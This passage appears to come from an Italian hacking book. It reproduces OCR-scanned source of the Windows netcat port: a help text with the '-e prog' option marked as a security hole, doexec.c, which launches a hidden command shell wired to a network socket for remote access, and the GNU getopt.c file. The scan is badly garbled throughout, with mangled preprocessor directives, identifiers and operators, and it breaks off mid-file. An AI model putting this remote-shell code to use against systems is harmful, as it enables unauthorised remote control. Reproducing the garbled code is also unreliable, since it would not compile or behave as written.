/* otherwise, we're just done */ 



Hfdef HAVE_HELP /* unless we wanna be *really* cryptic */ 

/* helpme : 

the obvious */ 
int helpme () 
{ 

o verbose = 1; 

holler ("[vi. 10 NT]\n\ 
connect to somewhere: ne [-options] hostname port[s] [ports] ... \n\ 
listen for inbound: ne -1 -p port [options] [hostname] [port]\n\ 
options: ") ; 

holler ("\ 

-d detach from console, background mode\n") ; 



Hfdef GAPING_SECURITY_HOLE /* needs to be separate holler () */ 
holler ("\ 

-e prog inbound program to exec [dangerous ! ! ] ") ; 

iendif 

holler ("\ 

-g gateway source-routing hop point [s] , up to 8\n\ 
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-h 


this cruft\n\ 


-i secs 


delay interval for lines sent, ports scanned\n\ 


-1 


listen mode, for inbound connects\n\ 


-L 


listen harder, re-listen on socket close\n\ 


-n 


numeric-only IP addresses, no DNS\n\ 


-o file 


hex dump of traffic\n\ 


-p port 


locai port number\n\ 


-r 


randomize locai and remote ports\n\ 


-s addr 


locai source address ") ; 


Hfdef TELNET 




holler ("\ 




-t 


answer TELNET negotiation" ) ; 


iendif 




holler ("\ 




-u 


UDP mode\n\ 


-v 


verbose [use tv/ice to be more verbose] \n\ 


-w secs 


timeout for connects and final net reads\n\ 


-z 


zero-I/O mode [used for scanning] ") ; 


ball ("port numbers can be individuai or ranges: m-n [inclusive] ") ; 


return (0) ; 




} /* helpme */ 




iendif /* HAVE_HELP 


*/ 



Dopo il successivo sorgente ha come nome doexec.c e il suo compito è quello di eseguire un 
comando. 



// portions Copyright (C) 1994 Nathaniel W. Mishkin 




// code taken from rlogind. exe 




iinclude <stdlib.h> 
^include <winsock2.h> 




iinclude <winbase.h> 




Hfdef GAPING_SECURITY_HOLE 




idefine BUFFER_SIZE 200 




extern char * prOOgie; 

void holler (char * str, char * pi, char * p2, char * p3, char * p4, 
p6); 


char * p5, char * 


char smbuff[20] ; 




// 

// Structure used to describe each session 

// 

typedef struct { 




// 

// These fields are filled in at session creation time 

// 

HANDLE ReadPipeHandle; // Handle to shell stdout pipe 
HANDLE WritePipeHandle; // Handle to shell stdin pipe 
HANDLE ProcessHandle; // Handle to shell process 




// 
// 

// These fields are filled in at session connect time and are only 
// valid when the session is connected 

// 

SOCKET ClientSocket; 

HANDLE ReadShellThreadHandle; // Handle to session shell-read thread 
HANDLE WriteShellThreadHandle; // Handle to session shell-read thread 


} SESSION_DATA, *PSESSION_DATA; 
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// 

// Private prototypes 

// 

Static HANDLE 

StartShell ( 

HANDLE StdinPipeHandle, 
HANDLE StdoutPipeHandle 

); 

static VOID 

SessionReadShellThreadFn ( 
LPVOID Parameter 

); 

static VOID 

SessionWriteShellThreadFn ( 
LPVOID Parameter 

); 



// *************************************************** 

// 

// CreateSession 

// 

// Creates a new session . Involves creating the shell process and establishing 
// pipes for communication with it . 

// 

// Returns a handle to the session or NULL on failure. 

// 

static PSESSION_DATA 
CreateSession ( 

VOID 

) 

{ 

PSESSION_DATA Session = NULL; 
BOOL Result; 

SECURITY_ATTRIBVTES SecurityAttributes; 
HANDLE ShellStdinPipe = NULL; 
HANDLE ShellStdoutPipe = NULL; 

// 

// Allocate space for the session data 

// 

Session = (PSESSION_DATA) malloc (sizeof (SESSION__DATA) ) ; 
if (Session == NULL) { 
return (NULL) ; 

} 

// 

// Reset fields in preparation for failure 

// 

Session->ReadPipeHandle = NULL; 
Session->WritePipeHandle = NULL; 



// 

// Create the I/O pipes for the shell 

// 

SecurityAttributes . nLength = sizeof (SecurityAttributes) ; 
SecurityAttributes . IpSecurityDescriptor = NULL; // Use default ACL 
SecurityAttributes .blnheritHandle = TRUE; // Shell will inherit handles 

Result = CreatePipe (&Session->ReadPipeHandle, SShellStdoutPipe, 
SSecurityAttributes , 0) ; 

if (! Result) { 

holler ("Failed to create shell stdout pipe, error = %s", 

itoa(GetLastError(), smbuff, 10), NULL, NULL, NULL, NULL, NULL); 

goto Failure; 

} 

Result = CreatePipe (&ShellStdinPipe, &Session->WritePipeHandle, 
SSecurityAttributes, 0) ; 
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if (ÌResult) { 

holler ("Failed to create shell stdin pipe, error = %s", 

itoa (GetLastError () , smbuff, 10), NULL, NULL, NULL, NULL, NULL) ; 

goto Failure; 

} 

// 

// Start the shell 

// 

Session->ProcessHandle = StartShell (ShellStdinPipe, ShellStdoutPipe) ; 

// 

// We're finished with our copy of the shell pipe handles 

// Closing the runtime handles will dose the pipe handles for us. 

// 

CloseHandle (ShellStdinPipe) ; 
CloseHandle (ShellStdoutPipe) ; 

// 

// Check result of shell start 

// 

if (Session->ProcessHandle == NULL) { 

holler ("Failed to execute shell", NULL, 

NULL, NULL, NULL, NULL, NULL) ; 

goto Failure; 

} 

// 

// The session is not connected, initialize variables to indicate that 

// 

Session->ClientSocket = INVALID_SOCKET ; 

// 

// Success, return the session pointer as a handle 

// 

return (Session) ; 



Failure : 



// 

// We get here for any failure case. 
// Free up any resources and exit 

// 

if (ShellStdinPipe != NULL) 

CloseHandle (ShellStdinPipe) ; 
if (ShellStdoutPipe != NULL) 

CloseHandle (ShellStdoutPipe) ; 
if (Session->ReadPipeHandle != NULL) 

CloseHandle (Session— >ReadPipeHandle) ; 
if (Session->WritePipeHandle != NULL) 

CloseHandle (Session->WritePipeHandle) ; 

free (Session) ; 
return (NULL) ; 



BOOL 
doexec ( 

SOCKET ClientSocket 

) 

{ 

PSESSION_DATA Session = CreateSession () ; 
SECURITY_ATTRIBUTES Securi tyAt t ributes; 
DWORD Threadld; 
HANDLE HandleArray [3] ; 
int i; 
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SecurityAttributes .blnheritHandle = FALSE; // No inheritance 

// 

// Store the client socket handle in the session structure so the thread 
// can get at it . This also signals that the session is connected. 

// 

Session->ClientSocket = ClientSocket ; 

// 

// Create the session threads 

// 

Session->ReadShellThreadHandle = 

CreateThread (SSecurityAttributes , 0, 

(LPTHREAD_START_ROUTINE) SessionReadShellThreadFn, 
(LPVOID) Session, 0, SThreadld) ; 

if (Session->ReadShellThreadHandle == NULL) { 

holler ("Failed to create ReadShell session thread, error = %s", 

itoa(GetLastError() , smbuff, 10), NULL, NULL, NULL, NULL, NULL); 



// 

// Reset the client pipe handle to indicate this session is disconnected 

// 

Session->ClientSocket = INVALID__SOCKET ; 
return (FALSE) ; 

} 

Session->WriteShellThreadHandle = 

CreateThread (SSecurityAttributes, 0, 

(LPTHREAD_START_ROUTINE) SessionWriteShellThreadFn, 
(LPVOID) Session, 0, SThreadld) ; 

if (Session->WriteShellThreadHandle == NULL) { 

holler ("Failed to create ReadShell session thread, error = %s", 

itoa(GetLastError() , smbuff, 10), NULL, NULL, NULL, NULL, NULL); 



// 

// Reset the client pipe handle to indicate this session is disconnected 

// 

Session->ClientSocket = INVALID_SOCKET ; 

TerminateThread(Session->WriteShellThreadHandle, 0) ; 
return (FALSE) ; 

) 

// 

// Wait for either thread or the shell process to finish 

// 

HandleArray [ 0 ] = Session->ReadShellThreadHandle; 
HandleArray [ 1 ] = Session->WriteShellThreadHandle; 
HandleArray [ 2 ] = Session— >ProcessHandle; 



i = WaitForMultipleObjects (3, HandleArray, FALSE, Oxffffffff); 



switch (i) ( 
case WAIT_OBJECT_0 + 0 : 

TerminateThread (Session->WriteShellThreadHandle , 0) ; 
TerminateProcess (Session->ProcessHandle, 1) ; 
break; 

case WAIT__OBJECT__0 + 1: 

TerminateThread (Session->ReadShellThreadHandle , 0) ; 
TerminateProcess (Session— >ProcessHandle, 1) ; 
break; 
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TerminateThread (Session->ReadShellThreadHandle , 0) ; 
break; 

default : 

holler ("WaitForMultipleObjects error: %s", 

itoa(GetLastError() , smbuff, 10), NULL, NULL, NULL, NULL, NULL) ; 

break; 

} 

// Close my handles to the threads, the shell process, and the shell plpes 
closesocket (Session->ClientSocket) ; 

DisconnectNamedPipe (Session->ReadPipeHandle) ; 
CloseHandle (Session->ReadPipeHandle) ; 

DisconnectNamedPipe (Session->WritePipeHandle) ; 
CloseHandle (Session->WritePipeHandle) ; 



CloseHandle (Session->ReadShellThreadHandle) ; 
CloseHandle (Session->WriteShellThreadHandle) ; 

CloseHandle (Session->ProcessHandle) ; 

free (Session) ; 
return (TRUE) ; 



// ********************************************************************** 

// 

// StartShell 

// 

// Execs the shell with the specified handle as stdin, stdout/err 

// 

// Returns process handle or NULL on failure 

// 

static HANDLE 
StartShell ( 

HANDLE ShellStdinPipeHandle, 

HANDLE ShellStdoutPipeHandle 

) 

{ 

PROCESS_INFORMATION Processlnformation; 

STARTUPINFO si; 

HANDLE ProcessHandle = NULL; 

// 

// Initialize process startup info 

// 

si.cb = sizeof (STARTUPINFO) ; 
si . IpReserved = NULL; 
si.lpTitle = NULL; 
si . lpDesktop = NULL; 
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si . wShowWindow = SW_HIDE; 
si . lpReserved2 = NULL; 
si . cbReserved2 = 0; 

si.dwFlags = STARTF_ USESTDHANDLES / STARTF_USESHOWWINDOW; 

si.hStdlnput = ShellStdinPipeHandle; 
si.hStdOutput = ShellStdoutPipeHandle; 

DuplicateHandle (GetCurrentProcess () , ShellStdoutP ipeHandle , 
GetCurrentProcess () , Ssi . hStdError, 
DUPLICATE_SAME_ACCESS, TRUE, 0) ; 

if (CreateProcess (NULL, prOOgie, NULL, NULL, TRUE, 0, NULL, NULL, 
Ssi, SProcessInformation) ) 

{ 

ProcessHandle = ProcessInformation.hProcess; 
CloseHandle (Processlnformation . hThread) ; 

ì 

else 

holler ("Failed to execute shell, error = %s", 

itoa(GetLastError(), smbuff, 10), NULL, NULL, NULL, NULL, NULL); 



return (ProcessHandle) ; 

} 



// ********************************************************************** 
// SessionReadShellThreadFn 

// 

// The read thread procedure. Reads frcm the pipe connected to the shell 
// process, writes to the socket . 

// 

static VOID 

SessionReadShellThreadFn ( 
LPVOID Parameter 
) 

{ 

PSESSION_DATA Session = Parameter; 
BYTE Buffer [B UFFER_ SIZE ] ; 
BYTE Buffer2 [BUFFER_SIZE+30] ; 
DWORD BytesRead; 



// this bogus peek is here because Win32 won't let me dose the pipe if it is 

// in waiting for input on a read. 
while (PeekNamedPipe (Session->ReadPipeHandle, Buffer, sizeof (Buffer) , 

SBytesRead, NULL, NULL) ) 

{ 

DWORD BufferCnt, BytesToWrite; 
BYTE PrevChar = 0; 



if (BytesRead > 0) 
{ 

ReadFile (Session->ReadPipeHandle, Buffer, sizeof (Buffer) , 
SBytesRead, NULL); 

} 

else 
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{ 

Sleep(50); 
continue; 

} 



// 

// Process the data we got from the shell : replace any naked LF's 
// with CR-LF pairs . 

// 

for (BufferCnt = 0, BytesToWrite = 0; BufferCnt < BytesRead; BufferCnt++) { 
if (Buffer [BufferCnt] == ' \n ' SS PrevChar != '\r') 

Buffer2 [BytesToWrite++] = '\r' ; 
PrevChar = Buffer2 [BytesToWrite++] = Buffer [BufferCnt] ; 

} 

if (send(Session->ClientSocket, Buffer2, BytesToWrite, 0) <= 0) 
break; 

} 

if (GetLastError() != ERROR BROKEN_PIPE) 

holler ( "SessionReadShellThreadFn exitted, error = %s", 

itoa(GetLastError(), smbuff, 10), NULL, NULL, NULL, NULL, NULL) ; 



ExitThread(O) ; 



// SessionWriteShellThreadFn 

// 

// The write thread procedure. Reads from socket, writes to pipe connected 
// to shell process. 



static VOID 

SessionWriteShellThreadFn ( 
LPVOID Parameter 
) 

{ 

PSESSION_DATA Session = Parameter; 

BYTE RecvBuffer[l ] ; 

BYTE Buffer [B UFFER_ SIZE ] ; 

BYTE EchoBuffer[5 ] ; 

DWORD BytesWritten; 

DWORD BufferCnt, EchoCnt; 

DWORD TossCnt = 0; 

BOOL PrevWasFF = FALSE; 

BufferCnt = 0; 

// 

// Loop, reading one byte at a time from the socket . 

// 

while (recv(Session->ClientSocket, RecvBuffer, sizeof (RecvBuffer) , 0) != 0) ( 



EchoCnt = 0; 



Buffer [BufferCnt++] = EchoBuffer [EchoCnt++] = RecvBuffer [ 0] ; 
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Buffer [BufferCnt++] = EchoBuffer [EchoCnt++] = '\n'; 



// Trap exit as it causes problems 
if (strnicmp (Buffer, "exit\r\n", 6) == 0) 
ExitThread(O) ; 



// 

// If we got a CR, it's time to send what we've buffered up down to the 
// shell process. 

// 

if (RecvBufferfO] == '\n< // RecvBuffer [0] == '\r') { 

if (! WriteFile (Session->WritePipeHandle, Buffer, BufferCnt, 
SBytesffritten, NULL) ) 

l 

break; 

} 

BufferCnt = 0; 

} 

} 



ExitThread(O) ; 

} 



Il terzo file del progetto si chiama getopt.c 



/* Getopt for GNU. 

NOTE: getopt is now part of the C library, so if you don't know what 
"Keep this file name— space clean" means, talk to roland@gnu.ai.mit.edu 
before changing it ! 

Copyright (C) 1987, 88, 89, 90, 91, 92, 93, 94 
Free Software Foundation, Inc. 

This file is part of the GNU C Library . Its master source is NOT part of 
the C library, however. The master source lives in /gd/gnu/lib . 

The GNU C Library is free software; you can redistribute it and/or 
modify it under the terms of the GNU Library General Public License as 
published by the Free Software Foundation; either version 2 of the 
License, or (at your option) any later version. 

The GNU C Library is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 
Library General Public License for more details . 

You should have received a copy of the GNU Library General Public 
License along with the GNU C Library; see the file COPYING.LIB. If 
not, write to the Free Software Foundation, Inc., 675 Mass Ave, 
Cambridge, MA 02139, USA. */ 

/* This tells Alpha OSF/1 not to de fine a getopt prototype in <stdio.h>. 

Ditto for AIX 3.2 and <stdlib.h>. */ 
Hfndef _NO_PROTO 
idefine _NO_PROTO 
iendif 

iifdef BAVE_ CONFIG_H 
^include <config.h> 
iendif 

#if Idefined ( STDC ; / / .' STDC 
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reject ' defined (const) '. */ 
iifndef const 
idefine const 
iendif 
iendif 

iinclude <std±o.h> 

iifdef WIN32 
iinclude <string.h> 
iendif 

/* Comment out ali this code if we are using the GNU C Library, and are not 
actually compiling the library itself. This code is part of the GNU C 
Library, but also included in many other GNU distributions . Compiling 
and linking in this code is a waste when using the GNU C library 
(especially if it is a shared library) . Rather than having every GNU 
program understand " con figure — with-gnu-libc ' and omit the object files, 
it is simpler to just do this in the source for each such file. */ 

iif defined (_LIBC) / / tdefined ( GNU LIBRARY ) 



/* This needs to come after some library iinclude 

to get GNU_LIBRARY defined. */ 

iifdef GNU_LIBRARY 

/* Don't include stdlib.h for non— GNU C libraries because some of them 

contain conflicting prototypes for getopt . */ 
iinclude <stdlib.h> 
iendif /* GNU C library. */ 

/* This version of " getopt' appears to the Caller like standard Unix 'getopt' 
but it behaves differently for the user, since it allows the user 
to intersperse the options with the other arguments . 

As 'getopt ' works, it permutes the elements of ARGV so that, 

when it is done, ali the options precede everything else. Thus 

ali application programs are extended to handle flexible argument order. 

Setting the environment variable POSIXLY_CORRECT disables permutation. 
Then the behavior is completely standard. 

GNU application programs can use a third alternative mode in which 

they can distinguish the relative order of options and other arguments . */ 

iinclude "getopt. h" 

/* For communication from 'getopt ' to the Caller. 

When 'getopt ' finds an option that takes an argument, 

the argument value is returned here. 

Also, when ' order ing' is RETURN_IN_ORDER, 

each non— option ARGV—element is returned here. */ 



char *optarg = NULL; 



/* Index in ARGV of the next element to be scanned. 

This is used for communication to and from the Caller 

and for communication between successive calls to 'getopt'. 

On entry to 'getopt ' , zero means this is the first cali; initialize . 

When 'getopt ' returns EOF, this is the index of the first of the 
non— option elements that the Caller should itself scan. 

Otherwise, 'optind' communicates from one cali to the next 
how much of ARGV has been scanned so far. */ 

/* XXX 1003.2 says this must be 1 before any cali. */ 
int optind = 0; 

/* The next char to be scanned in the option— element 

in which the last option character we returned was found. 
This allows us to pick up the scan where we left off. 



If this is zero, or a nuli string, it means resumé the scan 
by advancing to the next ARGV—element . */ 
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static char *nextchar; 

/* Callers store zero Jiere to inhibit the error message 
for unrecognized options . */ 

int opterr = 1; 

/* Set to an option character which was unrecognized. 

This must be initialized on some systems to avoid linking in the 
system 's own getopt implementation . */ 

int optopt = '?'; 

/* Describe how to deal with options that follow non-option ARGV—elements . 
If the Caller did not specify anything, 

the default is REQUIRE_ORDER if the environment variable 
POSIXLY_CORRECT is defined, PERMUTE otherwise. 

REQUIRE_ORDER means don't recognize them as options; 
stop option processing when the first non-option is seen. 
This is what Unix does. 

This mode of operation is selected by either setting the environment 
variable POSIXLY__CORRECT , or using "+' as the first character 
of the list of option characters . 

PERMUTE is the default . We permute the contents of ARGV as we scan, 
so that eventually ali the non— options are at the end. This allows options 
to be given in any order, even with programs that were not written to 
expect this. 

RETURN_IN_ORDER is an option available to programs that were written 

to expect options and other ARGV-elements in any order and that care about 

the ordering of the two. We describe each non-option ARGV—element 

as if it were the argument of an option with character code 1 . 

Using "—' as the first character of the list of option characters 

selects this mode of operation. 

The special argument * — ' forces an end of option-scanning regardless 
of the value of 'ordering'. In the case of RETURN_IN_ORDER, only 
* — ' can cause 'getopt' to return EOF with 'optind' != ARGO. */ 

static enum 
{ 

REQUIRE_ORDER, PERMUTE, RETURN^ IN ORDER 
} ordering; 

/* Value of POSIXLY_CORRECT environment variable. */ 
static char *posixly_correct ; 

iifdef GNU_LIBRARY 

/* We want to avoid inclusion of string.h with non-GNU libraries 
because there are many ways it can cause trouble. 

On some systems, it contains special magic macros that don 't work 

in GCC. */ 
iinclude <string.h> 
§definemy_index strchr 
§else 

/* Avoid depending on library functions or files 
whose names are inconsistent . */ 

char *getenv () ; 

static char * 
my_index (str, chr) 

const char *str; 

int chr; 

{ 

while (*str) 
{ 

if (*str == chr) 

return (char *) str; 
str++; 
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/* If using GCC, we can safely declare strlen this way. 

If not using GCC, it is ok not to declare it . */ 
Hfdef GNUC_ 

/* Note that Motorola Delta 68k R3V7 comes with GCC but not stddef.h. 

That was relevant to code that was here before. */ 
§if Idefined ( STDC ; / / .' STDC 

/* gcc with —traditional declares the built—in strlen to return int, 

and has done so at least since version 2.4.5. — rms . */ 
extern int strlen (const char *) ; 

iendif /* not STDC */ 

iendif /* GNUC_ */ 

iendif /* not GNU_LIBRARY */ 

/* Handle permutation of arguments . */ 

/* Describe the part of ARGV that contains non—options that have 

been skipped. " firstnonopt ' is the index in ARGV of the first of them; 
* last nonopt ' is the index after the last of them. */ 



static int first__nonopt ; 
static int last__nonopt ; 



/* Exchange two adjacent subsequences of ARGV. 

One subsequence is elements [first__nonopt, last_nonopt) 
which contains ali the non—options that have been skipped so far. 
The other is elements [last nonopt, optind) , which contains ali 
the options processed since those non—options were skipped. 

* first__nonopt ' and ' last__nonopt ' are relocated so that they describe 
the new indices of the non—options in ARGV after they are moved. */ 

static void 
exchange (argv) 

char **argv; 

{ 

int bottom = first_nonopt ; 
int middle = last_nonopt; 
int top = optind; 
char *tem; 

/* Exchange the shorter segment with the far end of the longer segment . 
That puts the shorter segment into the right place. 
It leaves the longer segment in the right place overall, 
but it consists of two parts that need to be swapped next . */ 

while (top > middle SS middle > bottom) 
{ 

if (top — middle > middle — bottom) 
{ 

/* Bottom segment is the short one. */ 
int len = middle - bottom; 
register int i; 

/* Swap it with the top part of the top segment . */ 
for (i = 0; i < len; i++) 
{ 

tem = argv [bottom + i] ; 

argv [bottom + i] = argv [top - (middle - bottom) + i] ; 
argv [top - (middle - bottom) + i] = tem; 

} 

/* Exclude the moved bottom segment from further swapping . */ 
top -= len; 

} 

else 
{ 

/* Top segment is the short one. */ 
int len = top - middle; 
register int i; 

/* Swap it with the bottom part of the bottom segment . */ 
for (i = 0; i < len; i++) 
{ 

tem = argv [bottom + i] ; 
argv [bottom + i] = argv [middle + i] ; 
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; 

/* Exclude the moved top segment from further swapping . */ 
bottoni += len; 

} 

} 

/* Update records for the slots the non-options now occupy. */ 

first_nonopt += (optind - last__nonopt ) ; 
last_nonopt = optind; 

} 

/* Initialize the internai data when the first cali is made. */ 

static const char * 
_getopt__initialize (optstring) 
const char *optstring; 

{ 

/* Start processing options with ARGV-element 1 (since ARGV—element 0 
is the program name) ; the sequence of previously skipped 
non—option ARGV— elements is empty. */ 

first^nonopt = last^nonopt = optind = 1; 

nextchar = NULL; 

posixly_correct = getenv ( "POSIXLY_CORRECT" ) ; 

/* Determine how to handle the ordering of options and nonoptions . */ 

if (optstringlO] == '-') 
{ 

ordering = RETURN_IN_ORDER; 
++optstring; 

} 

else if (optstring [0] == '+') 
{ 

ordering = REQUIRE_ORDER; 
++optstring; 

} 

else if (posixly__correct != NULL) 

ordering = REQUIRE_ORDER; 
else 

ordering = PERMUTE; 
return optstring; 

} 

/* Scan elements of ARGV (whose length is ARGO) for option characters 
given in OPTSTRING. 

If an element of ARGV starts with and is not exactly "—" or " — ", 

then it is an option element . The characters of this element 

(aside from the initial '—') are option characters. If " getopt ' 

is called repeatedly, it returns successively each of the option characters 

from each of the option elements. 

If "getopt ' finds another option character, it returns that character, 
updating 'optind' and 'nextchar' so that the next cali to 'getopt' can 
resumé the scan with the following option character or ARGV-element . 

If there are no more option characters, 'getopt' returns 'EOF'. 
Then 'optind' is the index in ARGV of the first ARGV-element 
that is not an option. (The ARGV-elements have been permuted 
so that those that are not options now come last . ) 

OPTSTRING is a string containing the legitimate option characters . 
If an option character is seen that is not listed in OPTSTRING, 
return '?' after printing an error message. If you set 'opterr' to 
zero, the error message is suppressed but we stili return ' ? ' . 

If a char in OPTSTRING is followed by a colon, that means it wants an arg, 
so the following text in the same ARGV-element, or the text of the following 
ARGV-element, is returned in 'optarg'. Two colons mean an option that 
wants an optional arg; if there is text in the current ARGV-element, 
it is returned in 'optarg ' , otherwise 'optarg' is set to zero. 
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If OPTSTRING starts with '-' or '+', it requests different methods of 
handling the non-option ARGV-elements . 

See the comments about RETURN_IN_ORDER and REQUIKE_ORDER, above. 
Long-named options begin with " — ' instead of 

Their names may be abbreviated as long as the abbreviation is unique 

or is an exact match for some defined option. If they have an 

argument, it follows the option name in the same ARGV-element , separated 

from the option name by a ' = ', or else the in next ARGV-element. 

When getopt' finds a long-named option, it returns 0 if that option' s 

"flag' field is nonzero, the value of the option' s 'vai' field 

if the ' flag' field is zero. 

The elements of ARGV aren't really const, because we permute them. 
But we pretend they 're const in the prototype to be compatible 
with other systems. 

LONGOPTS is a vector of * struct option' texminated by an 
element containing a name which is zero. 

LONGIND returns the index in LONGOPT of the long-named option found. 
It is only valid when a long-named option has been found by the most 
recent cali. 



If LONG__ONLY is nonzero, '—' as well as ' — ' can introduce 
long-named options. */ 



int 

__getopt_internal (argc, argv, optstring, longopts, longind, long_only) 
int argc; 

char *const *argv; 

const char *optstring; 

const struct option *longopts ; 

int *longind; 

int long_only; 

{ 

optarg = NULL; 

if (optind == 0) 

optstring = __getopt_initialize (optstring) ; 

if (nextchar == NULL II *nextchar == '\0') 
{ 

/* Advance to the next ARGV-element. */ 

if (ordering == PERMUTE) 
{ 

/* If we have just processed some options following some non-options, 
exchange them so that the options come first . */ 

if (first_nonopt .'= last_nonopt SS last nonopt .'= optind) 

exchange ( ( char **) argv) ; 
else if (last_nonopt != optind) 

first nonopt = optind; 

/* Skip any additional non-options 

and extend the range of non-options previously skipped. */ 

while (optind < argc 

SS (argv [optind] [0] != '-' Il argv [optind] [1] == '\0')) 
optind++; 
last_nonopt = optind; 

} 

/* The special ARGV-element 1 — ' means premature end of options. 
Skip it like a nuli option, 

then exchange with previous non-options as if it were an option, 
then skip everything else like a non-option. */ 

if (optind != argc SS ! strcmp (argv [optind], " — ")) 
{ 

optind++; 

if (first__nonopt '.= last_nonopt SS last^nonopt '.= optind) 
exchange ( ( char **) argv) ; 
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last_nonopt = argc; 



optind = argc; 

} 

/* If we have done ali the ARGV-elements, stop the scan 

and back over any non-options that we skipped and permuted. */ 

if (optind == argc) 
{ 

/* Set the next-arg-index to point at the non-options 

that we previously skipped, so the Caller will digest than. */ 
if ( first nonopt .'= last_nonopt) 

optind = first_nonopt ; 
return EOF; 

} 

/* If we have come to a non—option and did not permute it, 

either stop the scan or describe it to the Caller and pass it by. */ 

if ( (argv [optind] [0] != '-' Il argv [optind] [1] == '\0')) 
l 

if (ordering == REQUIRE__ORDER) 

return EOF; 
optarg = argv [optind++] ; 
return 1; 



/* We have found another option—ARGV-element. 
Skip the initial punctuation. */ 



nextchar = (argv [optind] + 1 

+ (longopts != NULL SS argv [optind] [1] == '-')); 

} 

/* Decode the current option-ARGV-element . */ 

/* Check whether the ARGV-element is a long option. 

If long only and the ARGV-element has the form "—£", where f is 
a valid short option, don 't consider it an abbreviated form of 
a long option that starts with f. Otherwise there would be no 
way to give the -f short option. 

On the other hand, if there ' s a long option "fubar" and 

the ARGV-element is "-fu", do consider that an abbreviation of 

the long option, just like " — fu", and not "-f" with arg "u". 

This distinction seems to be the most useful approach. */ 

if (longopts != NULL 

SS (argv [optind] [1] == '-' 

Il (long__only SS (argv [optind] [2] Il !my_index (optstring, 
argv [optind] [1]))))) 
l 

char *nameend; 

const struct option *p; 

const struct option *pfound = NULL; 

int exact = 0; 

int ambig = 0; 

int indfound; 

int option_index; 



for (nameend = nextchar; *nameend SS *nameend ! = 
/* Do nothing. */ ; 



' ; nameend++) 



/* Test ali long options for either exact match 

or abbreviated matches . */ 
for (p = longopts , option^index = 0; p->name; p++, option_index++) 
if (ìstrncmp (p->name, nextchar, nameend - nextchar)) 



{ 



if ( (unsigned int) (nameend — nextchar) == (unsigned int) strlen (p->name) ) 



{ 



/* Exact match found 
pfound = p; 
indfound = option_index; 



/ 
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break; 

} 

else if (pfound == NULL) 
{ 

/* First nonexact match found. */ 
pfound = p; 

indfound = option__index; 

ì 

else 

/* Second or later nonexact match found. */ 
ambig = 1; 

} 

if (ambig SS ìexact) 
l 

if (opterr) 

fprintf (stderr, "%s: option '%s' is ambiguous\n" , 
argv[0], argv [optind] ) ; 
nextchar += strlen (nextchar) ; 
optind++; 
return '?'; 



if (pfound != NULL) 
{ 

option^index = indfound; 
optind++; 
if (*nameend) 
{ 

/* Don't test has_arg with >, because seme C compilers don't 

allow it to be used on enums . */ 
if (pfound->has_arg) 

optarg = nameend + 1; 
else 

{ 

if (opterr) 
( 

if (argv[optind - 1] [1] == '-') 
/* — option */ 
fprintf (stderr, 

"%s: option " — %s ' doesn't allow an argument\n", 
argv[0], pfound->name) ; 

else 

/* +option or -option */ 

fprintf (stderr, 

"%s: option " %c%s ' doesn't allow an argument\n" , 
argv[0], argv [optind - 1][0], pfound->name) ; 

} 

nextchar += strlen (nextchar) ; 
ret urn ' ? ' ; 

} 

} 

else if (pfound->has_arg == 1) 
{ 

if (optind < arge) 

optarg = argv [optind++] ; 
else 

{ 

if (opterr) 

fprintf (stderr, "%s: option ~%s' requires an argument\n" , 
argv[0] , argv [optind - 1]); 
nextchar += strlen (nextchar) ; 
return optstring[0] == ':' ? ':' : '?'; 

} 

} 

nextchar += strlen (nextchar) ; 
if (longind != NULL) 

*longind = option__index; 
if (pfound->flag) 

{ 

* (pfound->flag) = pfound->val; 
return 0; 

} 

return pfound->val; 
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or the option starts with ' — ' or is not a valid short 
option, then it 's an error. 

Otherwise interpret it as a short option. */ 
if (!long_only II argv [optind] [1] == '-' 

1 1 my_index (optstring, *nextchar) == NULL) 

( 

if (opterr) 
{ 

if (argv [optind] [1] == '-') 
/* — option */ 

fprintf (stderr, "%s: unrecognized option " — %s'\n", 
argv[ 0 ] , nextchar) ; 

else 

/* +option or —option */ 

fprintf (stderr, "%s: unrecognized option * %c%s '\n", 
argv[ 0 ] , argv [optind] [0] , nextchar) ; 

} 

nextchar = (char *) ""; 
optind++; 
return '?'; 

} 

} 

/* Look at and handle the next short option-character . */ 
{ 

char c = *nextchar++; 

char *temp = my_index (optstring, c) ; 

/* Increment * optind' when we start to process its last character. */ 
if (*nextchar == '\0') 
++optind; 

if (temp == NULL II c == ' : ') 
{ 

if (opterr) 
{ 

if (posixly_correct) 

/* 1003.2 specifies the format of this message. */ 
fprintf (stderr, "%s: illegal option — %c\n", argv[0], c) ; 

else 

fprintf (stderr, "%s: invalid option — %c\n", argv[0], c) ; 

} 

optopt = c; 
return '?'; 

} 

if (temp[l] == ' :') 
{ 

if (temp [2] == ' : ') 
{ 

/* This is an option that accepts an argument optionally. */ 
if (*nextchar != '\0') 
{ 

optarg = nextchar; 
optind++; 

} 

else 

optarg = NULL; 
nextchar = NULL; 

} 

else 
{ 

/* This is an option that requires an argument . */ 
if (*nextchar != '\0') 
{ 

optarg = nextchar; 

/* If we end this ARGV-element by taking the rest as an arg, 

we must advance to the next element now. */ 
optind++; 

} 

else if (optind == argc) 
{ 

if (opterr) 
{ 

/* 1003.2 specifies the format of this message. */ 
fprintf (stderr, "%s: option requires an argument — %c\n", 
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; 

optopt = c; 

if (optstr±ng[0] == ':') 

c = ': '; 
else 

c = '?'; 

} 

else 

/* fife already incremented 'optind' once; 

increment it again when taking next ARGV—elt as argument . */ 
optarg = argv [optind++] ; 
nextchar = NULL; 

} 

} 

return c; 

} 

} 

int 

getopt (argc, argv, optstring) 
int argc; 

char *const *argv; 
const char *optstring; 

{ 

return _getopt_internal (argc, argv, optstring, 

(const struct option *) 0, 

(int *) 0, 

0); 



iendif /* _LIBC or not GNU_LIBRARY . */ 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



iifdef TEST 



/* Compile with -DTEST to make an executable for use in testing 
the above definition of 'getopt'. */ 



int 

main (argc, argv) 
int argc; 
char **argv; 

{ 

int c; 

int digit_optind = 0; 

while (1) 
{ 

int thisoptionoptind = optind ? optind : 1; 



c = getopt (argc, argv, "abc : d: 0123456789" ) ; 
if (c == EOF) 
break; 



switch (c) 
{ 

case ' 0 ' : 
case •1<: 
case '2': 
case '3': 
case ' 4 ' : 
case ' 5 ' : 
case ' 6 ' : 
case '7': 
case ' 8 ' : 
case '9': 

if (digit_optind != 0 SS digit_optind != this_option_optind) 
printf ("digits occur in two different argv-elements . \n" ) ; 
digit_optind = this_option_optind; 
printf ("option %c\n", c) ; 
break; 



case 'a' : 

